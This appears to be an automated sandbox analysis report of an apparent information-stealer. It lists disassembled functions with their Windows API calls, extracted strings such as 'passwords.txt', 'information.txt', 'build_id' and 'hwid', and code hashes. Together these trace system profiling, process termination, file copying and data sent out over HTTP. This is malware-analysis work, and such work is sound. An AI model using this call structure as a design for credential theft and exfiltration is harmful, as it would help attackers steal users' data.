                                                                                      • Part of subcall function 0040FEB4: wsprintfA.USER32 ref: 0040FF4D
                                                                                      • Part of subcall function 0040FE81: GetSystemInfo.KERNEL32(00000000), ref: 0040FE8E
                                                                                      • Part of subcall function 0040FE81: wsprintfA.USER32 ref: 0040FEA3
                                                                                      • Part of subcall function 0040FF81: GetProcessHeap.KERNEL32(00000000,00000104,00000001,00000000,00000000,?,Windows: ,00000000,?,00426624,00000000,?,Work Dir: In memory,00000000,?,0042660C), ref: 0040FF8F
                                                                                      • Part of subcall function 0040FF81: HeapAlloc.KERNEL32(00000000), ref: 0040FF96
                                                                                      • Part of subcall function 0040FF81: GlobalMemoryStatusEx.KERNEL32 ref: 0040FFB6
                                                                                      • Part of subcall function 0040FF81: wsprintfA.USER32 ref: 0040FFDC
                                                                                      • Part of subcall function 0040FFEA: _EH_prolog.MSVCRT ref: 0040FFEF
                                                                                      • Part of subcall function 0040FFEA: EnumDisplayDevicesA.USER32(00000000,00000000,?,00000001), ref: 00410057
                                                                                      • Part of subcall function 004102C3: _EH_prolog.MSVCRT ref: 004102C8
                                                                                      • Part of subcall function 004102C3: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00410303
                                                                                      • Part of subcall function 004102C3: Process32First.KERNEL32(00000000,00000128), ref: 00410314
                                                                                      • Part of subcall function 004102C3: Process32Next.KERNEL32(?,00000128), ref: 0041037C
                                                                                      • Part of subcall function 004102C3: CloseHandle.KERNEL32(?,?,00000000), ref: 00410389
                                                                                      • Part of subcall function 00410071: _EH_prolog.MSVCRT ref: 00410076
                                                                                      • Part of subcall function 00410071: RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,004262C7,00000001,00000000), ref: 004100BE
                                                                                      • Part of subcall function 00410071: RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 00410108
                                                                                      • Part of subcall function 00410071: wsprintfA.USER32 ref: 00410132
                                                                                      • Part of subcall function 00410071: RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 0041014F
                                                                                      • Part of subcall function 00410071: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 00410179
                                                                                      • Part of subcall function 00410071: lstrlenA.KERNEL32(?), ref: 0041018E
                                                                                      • Part of subcall function 00410071: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,00000000,?,?,00000000,?,004262F0), ref: 0041020E
                                                                                    • lstrlenA.KERNEL32(00000000,00000000,?,00426748,00000000,?,00000000,00000000,?,00000000,00000000,?,[Software],00000000,?,00426738), ref: 0041537A
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
                                                                                      • Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                                      • Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                                      • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000438000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052E000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000534000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000553000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000003.00000002.2039421679.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Heap$H_prolog$Process$Alloc$wsprintf$CreateOpen$InitializeQueryValuelstrcpy$InformationLocalNamelstrlen$BlanketCapsCloseCurrentDeviceEnumHandleInfoInitInstanceKeyboardLayoutListProcess32ProxySecurityTimeVariantlstrcat$CharComputerDevicesDirectoryDisplayFileFirstFreeGlobalLocaleLogicalMemoryModuleNextObjectProcessorProfileReleaseSingleSnapshotStatusSystemThreadToolhelp32UserVolumeWaitWindowsZonememset
                                                                                    • String ID: AV: $Computer Name: $Cores: $Date: $Display Resolution: $GUID: $HWID: $Install Date: $Keyboard Languages: $Local Time: $MachineID: $Path: $Processor: $RAM: $T$Threads: $TimeZone: $User Name: $Version: $VideoCard: $Windows: $Work Dir: In memory$[Hardware]$[Processes]$[Software]$information.txt
                                                                                    • API String ID: 722754166-3257470747
                                                                                    • Opcode ID: 4b9fd54f7e51e5b3625fb3809e0446a4ef10545269b0a6af337ebca9e7ba9020
                                                                                    • Instruction ID: 15cc8dd7e761a7b9687d1197911a175701b94bd7e601d052700fcacce4104c59
                                                                                    • Opcode Fuzzy Hash: 4b9fd54f7e51e5b3625fb3809e0446a4ef10545269b0a6af337ebca9e7ba9020
                                                                                    • Instruction Fuzzy Hash: 53922EB190424DE9CB15E7E1C952BEEBB789F24308F5001BEE505725C2DE782B8CCAB5

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 0040C280
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 00410B5C: _EH_prolog.MSVCRT ref: 00410B61
                                                                                      • Part of subcall function 00410B5C: GetSystemTime.KERNEL32(?,00426498,00000001,000000C8,00000000,004265BA), ref: 00410BA1
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                    • CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,?,00425BA4,?,?,?,00425B9E,?,00000000), ref: 0040C378
                                                                                    • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 0040C3D9
                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 0040C3E0
                                                                                    • lstrlenA.KERNEL32(00000000,00000000), ref: 0040C470
                                                                                    • lstrcat.KERNEL32(00000000), ref: 0040C487
                                                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 0040C499
                                                                                    • lstrcat.KERNEL32(00000000,00425BA8), ref: 0040C4A7
                                                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 0040C4B9
                                                                                    • lstrcat.KERNEL32(00000000,00425BAC), ref: 0040C4C7
                                                                                    • lstrcat.KERNEL32(00000000), ref: 0040C4D6
                                                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 0040C4E8
                                                                                    • lstrcat.KERNEL32(00000000,00425BB0), ref: 0040C4F6
                                                                                    • lstrcat.KERNEL32(00000000), ref: 0040C505
                                                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 0040C517
                                                                                    • lstrcat.KERNEL32(00000000,00425BB4), ref: 0040C525
                                                                                    • lstrcat.KERNEL32(00000000), ref: 0040C534
                                                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 0040C546
                                                                                    • lstrcat.KERNEL32(00000000,00425BB8), ref: 0040C554
                                                                                    • lstrcat.KERNEL32(00000000,00425BBC), ref: 0040C562
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 0040C596
                                                                                    • memset.MSVCRT ref: 0040C5E9
                                                                                    • DeleteFileA.KERNEL32(00000000), ref: 0040C616
                                                                                      • Part of subcall function 004063B1: _EH_prolog.MSVCRT ref: 004063B6
                                                                                      • Part of subcall function 004063B1: memcmp.MSVCRT ref: 004063DC
                                                                                      • Part of subcall function 004063B1: memset.MSVCRT ref: 0040640B
                                                                                      • Part of subcall function 004063B1: LocalAlloc.KERNEL32(00000040,-000000E1,?,?,?,?,00000000,00000000), ref: 00406440
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000438000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052E000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000534000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000553000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000003.00000002.2039421679.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcat$H_prolog$lstrcpy$lstrlen$FileHeapmemset$AllocAllocateCopyDeleteLocalProcessSystemTimememcmp
                                                                                    • String ID: passwords.txt
                                                                                    • API String ID: 3298853120-347816968
                                                                                    • Opcode ID: b59979e0928ef6e5aefeb439e8188f89191dca433fd258269f78d84d3eaa090d
                                                                                    • Instruction ID: 3d2456610e152fb8fa5d54acb3feaddce6e398d7491f6e002fa618601dbd43d1
                                                                                    • Opcode Fuzzy Hash: b59979e0928ef6e5aefeb439e8188f89191dca433fd258269f78d84d3eaa090d
                                                                                    • Instruction Fuzzy Hash: 00C16971800159EEDB15EBE4DD1AEEEBB75BF18304F10407AF512B21E1DB782A09DB25

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00413911
                                                                                      • Part of subcall function 004135AC: _EH_prolog.MSVCRT ref: 004135B1
                                                                                      • Part of subcall function 0040F997: lstrlenA.KERNEL32(?,00000000,?,004169B9,004265B7,004265B6,00000000,00000000,?,00417314), ref: 0040F9A0
                                                                                      • Part of subcall function 0040F997: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F9D4
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00413ADD
                                                                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00413B5E
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 0041303A: _EH_prolog.MSVCRT ref: 0041303F
                                                                                      • Part of subcall function 0041303A: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 0041309D
                                                                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00413C8A
                                                                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00413D0B
                                                                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00413E37
                                                                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00413EB8
                                                                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00413FE4
                                                                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00414065
                                                                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00414191
                                                                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 0041420C
                                                                                    • Sleep.KERNEL32(0000EA60), ref: 0041421B
                                                                                      • Part of subcall function 00413118: _EH_prolog.MSVCRT ref: 0041311D
                                                                                      • Part of subcall function 00413118: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0041319F
                                                                                      • Part of subcall function 00413118: lstrlenA.KERNEL32(00000000), ref: 004131B6
                                                                                      • Part of subcall function 00413118: StrStrA.SHLWAPI(00000000,00000000), ref: 004131DD
                                                                                      • Part of subcall function 00413118: lstrlenA.KERNEL32(00000000), ref: 004131F2
                                                                                      • Part of subcall function 00413118: lstrlenA.KERNEL32(00000000), ref: 0041320D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000438000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052E000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000534000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000553000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000003.00000002.2039421679.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prolog$lstrcpylstrlen$Sleep
                                                                                    • String ID: *$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                                                                    • API String ID: 1345713276-3681523784
                                                                                    • Opcode ID: 8d9ac18b8df2a6b284955ed97a086bcb1f821ef7b8b64bcd58f2fc5db10276e4
                                                                                    • Instruction ID: 81b84598b74079d87ef3f85c7997e73a576bc14dc27035db183a239247f2f400
                                                                                    • Opcode Fuzzy Hash: 8d9ac18b8df2a6b284955ed97a086bcb1f821ef7b8b64bcd58f2fc5db10276e4
                                                                                    • Instruction Fuzzy Hash: D5626370904248EADB10EBE5C956BDEBBB89F19308F5041BEF445B32C1DB785B4C8B66

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00403AFA
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 00403A54: _EH_prolog.MSVCRT ref: 00403A59
                                                                                      • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A8B
                                                                                      • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A94
                                                                                      • Part of subcall function 00403A54: ??_U@YAPAXI@Z.MSVCRT ref: 00403A9D
                                                                                      • Part of subcall function 00403A54: lstrlenA.KERNEL32(00000000,00000000,?,?,00000001,000000C8), ref: 00403AB7
                                                                                      • Part of subcall function 00403A54: InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 00403AC7
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00403BA5
                                                                                    • StrCmpCA.SHLWAPI(?), ref: 00403BBC
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                    • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00403D44
                                                                                    • HttpOpenRequestA.WININET(?,?,00000000,00000000,-00400100,00000000), ref: 00403D7E
                                                                                    • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00403DA2
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                    • lstrlenA.KERNEL32(00000000,00000000,?,?,?,?,004259CD,00000000,?,?,00000000,?,",00000000,?,build_id), ref: 0040407E
                                                                                    • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00404097
                                                                                    • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 004040A8
                                                                                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 004040FC
                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00404107
                                                                                    • InternetCloseHandle.WININET(?), ref: 0040411C
                                                                                    • InternetCloseHandle.WININET(?), ref: 00404125
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Internet$lstrcpy$H_prologlstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileOptionReadSend
                                                                                    • String ID: !$"$"$------$------$------$build_id$hwid
                                                                                    • API String ID: 1139859944-3346224549
                                                                                    • Opcode ID: 6dfa883d49b08ce1d907c8d0173507c2161b387eb4e9c2766cbb1b52305e547a
                                                                                    • Instruction ID: 7cb0d70ecfea339ca3c9d0d40474d85fcafec7ec4a7ae7ad7b1869ac4000fa9b
                                                                                    • Opcode Fuzzy Hash: 6dfa883d49b08ce1d907c8d0173507c2161b387eb4e9c2766cbb1b52305e547a
                                                                                    • Instruction Fuzzy Hash: 36223BB190424CEADB11EBE4C956BEEBBB8AF18308F50417EE50573582DE781B4CCB65

                                                                                    Control-flow Graph
                                                                                    [Control-flow graph of the function starting at 00406737; legend: executed / not executed blocks]
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 0040673C
                                                                                      • Part of subcall function 0040FB28: StrCmpCA.SHLWAPI(?,?,?,00408A88,00425DD4,00000000), ref: 0040FB31
                                                                                    • CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,?,00000000,?,00425BD0,?,?,?,00425BA6,?,00000000), ref: 004068A8
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 00411056: _EH_prolog.MSVCRT ref: 0041105B
                                                                                      • Part of subcall function 00411056: memset.MSVCRT ref: 0041107D
                                                                                      • Part of subcall function 00411056: OpenProcess.KERNEL32(00001001,00000000,?,?,?,?,00000000,?), ref: 00411104
                                                                                      • Part of subcall function 00411056: TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000000,?), ref: 00411112
                                                                                      • Part of subcall function 00411056: CloseHandle.KERNEL32(00000000,?,?,?,00000000,?), ref: 00411119
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                    • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00406A9A
                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00406AA1
                                                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00406BBF
                                                                                    • lstrcat.KERNEL32(00000000,00425BEC), ref: 00406BCD
                                                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00406BDF
                                                                                    • lstrcat.KERNEL32(00000000,00425BF0), ref: 00406BED
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 00406D34
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 00406D42
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
                                                                                      • Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                                      • Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                                    • memset.MSVCRT ref: 00406D9A
                                                                                    • DeleteFileA.KERNEL32(00000000), ref: 00406DBF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prologlstrcat$lstrcpy$Processlstrlen$FileHeapmemset$AllocateCloseCopyCreateDeleteHandleObjectOpenSingleTerminateThreadWait
                                                                                    • String ID:
                                                                                    • API String ID: 4187064601-0
                                                                                    • Opcode ID: ea3e131a31bfade24d911b2f4923d0140332d684978b2b21ba3cf0083f7bbf7d
                                                                                    • Instruction ID: 623c21351db5d7502ddbdcae5b6d8d47bff6a1d16c2b78033439981e25a1e23c
                                                                                    • Opcode Fuzzy Hash: ea3e131a31bfade24d911b2f4923d0140332d684978b2b21ba3cf0083f7bbf7d
                                                                                    • Instruction Fuzzy Hash: 3F224871904248EADF15EBE4DD56AEEBB75AF18308F50407EF402721D2DF782A09DB26
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 0040875E
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 00410B5C: _EH_prolog.MSVCRT ref: 00410B61
                                                                                      • Part of subcall function 00410B5C: GetSystemTime.KERNEL32(?,00426498,00000001,000000C8,00000000,004265BA), ref: 00410BA1
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                    • CopyFileA.KERNEL32(00000000,00000000,00000001,00000000,00000000,00000000,?,00425DC8,?,?,?,00425BEA,00000000), ref: 00408841
                                                                                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 004089AE
                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 004089B5
                                                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00408AD8
                                                                                    • lstrcat.KERNEL32(00000000,00425DDC), ref: 00408AE6
                                                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 00408AF8
                                                                                    • lstrcat.KERNEL32(00000000,00425DE0), ref: 00408B06
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 00408C19
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 00408C27
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
                                                                                      • Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
                                                                                      • Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA
                                                                                    • memset.MSVCRT ref: 00408C7F
                                                                                    • DeleteFileA.KERNEL32(00000000), ref: 00408CA4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prologlstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyCreateDeleteObjectProcessSingleSystemThreadTimeWaitmemset
                                                                                    • String ID:
                                                                                    • API String ID: 156379684-0
                                                                                    • Opcode ID: 8ee0452d1c9f8879db682c44a8bd06a3f2f501328dfa6872344a5bf684e5f478
                                                                                    • Instruction ID: 517fb1482c7bf48e2daa8cc91bc62da6b68edd990b633fa38b7ec1900e684afa
                                                                                    • Opcode Fuzzy Hash: 8ee0452d1c9f8879db682c44a8bd06a3f2f501328dfa6872344a5bf684e5f478
                                                                                    • Instruction Fuzzy Hash: 11F15771804158EADB15EBE4DD1ABEEBB74AF18308F50407EE405B21E2DF782A09DB25
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00410781
                                                                                    • CoInitializeEx.OLE32(00000000,00000000,00000001,?,00000000,?,?,?,?,?,?,00426624,00000000,?,Work Dir: In memory,00000000), ref: 00410799
                                                                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00000000), ref: 004107AA
                                                                                    • CoCreateInstance.OLE32(00426FAC,00000000,00000001,00426EDC,?,?,00000000,?,?,?,?,?,?,00426624,00000000,?), ref: 004107C4
                                                                                    • CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00000000), ref: 004107FA
                                                                                    • VariantInit.OLEAUT32(?), ref: 00410855
                                                                                      • Part of subcall function 004106C4: _EH_prolog.MSVCRT ref: 004106C9
                                                                                      • Part of subcall function 004106C4: CoCreateInstance.OLE32(00426D5C,00000000,00000001,00426488,?,00000001,00000000,00000000,00000001,?,00000000), ref: 004106F0
                                                                                      • Part of subcall function 004106C4: SysAllocString.OLEAUT32(?), ref: 004106FD
                                                                                      • Part of subcall function 004106C4: _wtoi64.MSVCRT ref: 00410738
                                                                                      • Part of subcall function 004106C4: SysFreeString.OLEAUT32(?), ref: 0041074B
                                                                                      • Part of subcall function 004106C4: SysFreeString.OLEAUT32(00000000), ref: 00410752
                                                                                    • FileTimeToSystemTime.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,00426624,00000000,?,Work Dir: In memory,00000000), ref: 0041088D
                                                                                    • GetProcessHeap.KERNEL32(?,?,00000000,?,?,?,?,?,?,00426624,00000000,?,Work Dir: In memory,00000000,?,0042660C), ref: 00410893
                                                                                    • HeapAlloc.KERNEL32(00000000,00000000,00000104,?,?,00000000,?,?,?,?,?,?,00426624,00000000,?,Work Dir: In memory), ref: 004108A0
                                                                                    • VariantClear.OLEAUT32(?), ref: 004108E2
                                                                                    • wsprintfA.USER32 ref: 004108CC
